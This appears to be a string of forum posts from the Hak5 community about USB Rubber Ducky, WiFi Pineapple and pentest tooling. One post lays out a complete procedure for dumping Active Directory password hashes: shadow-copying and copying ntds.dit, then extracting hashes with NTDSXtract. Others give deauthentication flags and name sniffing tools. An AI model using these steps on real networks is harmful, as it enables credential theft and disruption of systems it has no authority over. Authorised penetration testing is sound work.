no42

use a single "-" not a double "--". java -jar encoder.jar -i input.txt

randomroll, or urlsnarf are what I usually demo. Edit: randomroll will work on android and iPhone (already tested :) ) , cant remember sound working on the iPhone, but sound definitely worked on android.

Use it for penetration testing purposes with signed contract. Try to use MAC white-listing to only permit connections from devices under assessment.

Crazy problem. Sounds like he filled the POS terminal (Micros 3700) HDD with ISOs, movies and other downloads/torrents. He was then playing with vlan security on a cisco switch. Then he went to school? The POS terminal could no longer connect to a database server (card processing?) so they could no longer process credit/debit card payments in the restaurant, his boss/family wanted to shoot him? They fell back to a manual process, of swiping cards and getting people to sign for the bills. When he returned from school, he went on the internet, realized his mistake, and corrected the problem. Hopefully, removed some crap or large log files from the HDD of the POS that may have caused the problem. The POS now works again, taking card payments, his boss/family are now happy again. Sidenote: Im worried that he may have inadvertently installed malware on a POS - PCI DSS breach.... If I end up in his restaurant I'll remember to pay with cash!

Done, on the v2 branch. Version 2.6 should be available for download in the usual place.

Just verified the Duck Programming.zip (20.8MB) - its fine. Downloads and extracts OK (Used Winrar to extract the contents). the file has been corrupted by Windows you getting \r at the end of lines which unix systems dont use, use dos2unix to convert the file apt-get install dos2unix then convert the file dos2unix install_v1.0.9.sh it should then run fine. Not sure about the reset of the scripts, sorry I havnt really used them or kali

List available java implementations $ update-java-alternatives --list Use openjdk-6 $ update-java-alternatives --set java-6-openjdk Use the non-free sun java. $ update-java-alternatives --set java-6-sun Use the non-free sun java only for the web plugin $ update-java-alternatives --plugin --set java-6-sun

use google to find version 1 posts: google: site:forums.hak5.org +version +1

Im sure I used opkg, from an ssh session type: opkg install dsniff

There is the REPEAT X command; where X is an integer.

-a is the access point -c should be the client looks like your trying to deauth the AP with itself??? -c can either equal a client mac aa:bb:cc:dd:ee:ff or equal a broadcast ff:ff:ff:ff:ff:ff:ff do deauth all clients

i installed dsniff, and used that instead.

there is/was a watchdog process... any process that consumes too much memory/processor affects performance, a thread that cannot count for something like 5secs, will result in the watchdog process thinking the device is in a DoS, so it resets to recover. this appeared in the original Fon/Fonera, and possibly other devices? what you running, how much is that process consuming the processor? I could be wrong? other hypothesis are welcome?

I agree with Mr-Protocol. The guy openly states its a cheap clone, and its an alternative for students and people low on fund$. In the comments he openly encourages people to buy the original Pineapple if they can afford one. Also, its bit of a do it yourself job, you might make a mistake, have trouble getting it to work? I'd say most people are willing to pay for a plug n play device. Hak5 wins here!

Ok, can you post a pic of device manager when your duck is installed.

Step 1: Create Shadow Copy Drive (native command)Creating the Shadowcopy of the drive CONTAINING the ntds.dit file (generally C: drive but could be somewhere else if the file is big): vssadmin create shadow /for=[drive letter:] Step 2: List Drives (native command)Check the path to the Shadowcopy Copy Volume, i.e \\?GLOBALROOT|device... vssadmin list shadows Step 3: Copy Files (native command)Copy the NTDS.dit and SYSTEM files out of the Volume(s): copy \\?GLOBALROOT|device[...]ntdis.dit and \\?GLOBALROOT|device[...]SYSTEM to your machine Step 4: Crack the HashGet the libesedb libraries from: http://code.google.com/p/libesedb/downloads/listExtract and compile the libesedb libraries [./configure, make, make install, ldconfig] Get the NTDSXtract framework - http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip After installing the libesedb libraries, extract the database tables from ntds.dit: esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit file> Extract the hashes/user info/password history: python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.4 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output Note: the link_table id could be link_table.4 or link_table.5 depending on the previous output Convert to pwdump format the output: python ntdstopwdump.py /tmp/ntds.dit.output

Look for Lorcon. Think it's actually included in Metasploit these days! (Though Metasploit does not appear to work on the pineapple), it may be possible to natively compile Lorcon.

Looks similar to whats in the hak shop http://hakshop.myshopify.com/collections/accessory/products/usb-battery-pack-3200mah Do you know the output current (Amps) before plugging it in? If its similar to ones on the internet you might have 1x 2A & 1x 1A port? If it is similar to the hakshop one, all you need is http://hakshop.myshopify.com/collections/accessory/products/usb-power-cable to connect it to the pineapple.

If your trying to perform from a standard users account, you need a privilege escalation bug/vuln/exploit inorder to get the admin privileges needed to install the client.

Differences are thats its all in C, I dont know of a specific API, so I guess the degree of programming difficulty is high, and development is slow. News: Heard from Darren, something is in the works! So hopefully in the next month something will happen, and we'll get an update on the forum / show. So hang tight for now.

Other links http://elasticsheep.com/2010/04/teensy2-usb-mass-storage-with-an-sd-card/ http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle http://code.google.com/p/kautilya/

what OS's are you using?

Its a good start... As python works in both Linux and Windows, can you get it to work in both. You should be able to detect the OS, then branch to either batchisp or dfu-programmer effectively. Keep up the good work.

Version 1 was based on the Teensy, but its incompatible with the latest version of DuckyScript. Version 1 Builds Can you find some other interested people and club together so postage is shared? I forked out the initial $80USD + postage, probably why I was determined to get it working, despite all the early problems, as keymaps were not anticipated. Its been a handy tool, that I don't want to part with.

Ok, Now I need to know: Firmware version of the duck Encoder version your payload your encoder command any output from the encoder your language.